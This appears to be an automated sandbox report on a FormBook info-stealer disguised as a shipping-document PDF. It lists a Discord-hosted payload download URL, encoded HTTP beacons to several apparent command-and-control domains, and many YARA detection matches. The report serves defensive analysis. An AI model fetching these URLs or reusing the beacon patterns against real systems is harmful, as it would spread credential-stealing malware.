<title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 00000001.00000002.299070698.00000000007DB000.00000004.00000001.sdmp, Nyedvqj.exe, 0000000E.00000002.341260604.0000000000692000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 00000001.00000002.299070698.00000000007DB000.00000004.00000001.sdmp, Nyedvqj.exe, 0000000E.00000002.341260604.0000000000692000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 00000001.00000002.299070698.00000000007DB000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/a
Source: Nyedvqj.exe, 0000000C.00000002.322309602.00000000007DB000.00000004.00000020.sdmp, Nyedvqj.exe, 0000000C.00000002.323669387.0000000002CE8000.00000004.00000001.sdmp, Nyedvqj.exe, 0000000E.00000002.341260604.0000000000692000.00000004.00000020.sdmp, Nyedvqj.exe, 0000000E.00000002.342777768.0000000002E18000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqe
Source: Nyedvqj.exe, 0000000E.00000002.341260604.0000000000692000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.discordapp.com/m
Source: netsh.exe, 00000014.00000002.539177729.0000000003EF2000.00000004.00020000.sdmp	String found in binary or memory: https://www.thesidehustler.net/epns/?wVzHJ=BRWdQ6&5jz=Su3clF2JWvLFGbUo36COKrlfR2cTjWdKqgNMt2UP/l

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: global traffic	HTTP traffic detected: GET /attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq HTTP/1.1User-Agent: lValiHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /epns/?5jz=Qaf9b58Tbh8Z520YhGjeYYsoKHR90rBEG3FUA1hNyjMgDr+YB08dwxAknUVnxeGDxphK&wVzHJ=BRWdQ6 HTTP/1.1Host: www.blttsperma.questConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?wVzHJ=BRWdQ6&5jz=LPVhQz/sUypmh3JEMdUjrMI+o15/eDTdWMxajLbAdDKUpS6Ve6IQQzlpFhrtZO4TJx+f HTTP/1.1Host: www.jkformationfrance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?5jz=mhsDKEoINpIYVMaR3w2yQRX/JkzkFS4RewGVgpiBV5SQmE2lgVGX8ujA+r04PphgcB3o&wVzHJ=BRWdQ6 HTTP/1.1Host: www.bombers.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?wVzHJ=BRWdQ6&5jz=D+mEdFX82Cju9hASn9EZxxK/L4be4H1Ia6Y0NmWcI3nDoqp7HXKUHxAIP+SNGKqRa1VB HTTP/1.1Host: www.goodtasteonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?5jz=YHZU9vngEBQXtyB5u9xn7pvVN7OmBffp0F4sE7DtsKiVljOHBP+VVTECwxdgyHUha7VA&wVzHJ=BRWdQ6 HTTP/1.1Host: www.alltart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?wVzHJ=BRWdQ6&5jz=Su3clF2JWvLFGbUo36COKrlfR2cTjWdKqgNMt2UP/lm1WcuW9iVFXF9WD2RXvaQquqUk HTTP/1.1Host: www.thesidehustler.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /epns/?5jz=Uper38P2wFVpXLMvMK5jmH9wYxHR33YjEArLoikkDOyYqkQ8aA8asj2sgPC5P0zW7/vl&wVzHJ=BRWdQ6 HTTP/1.1Host: www.eimzaizmir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49760 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Yara signature match

Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, type: SAMPLE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.0.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 1.0.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 12.0.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 14.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
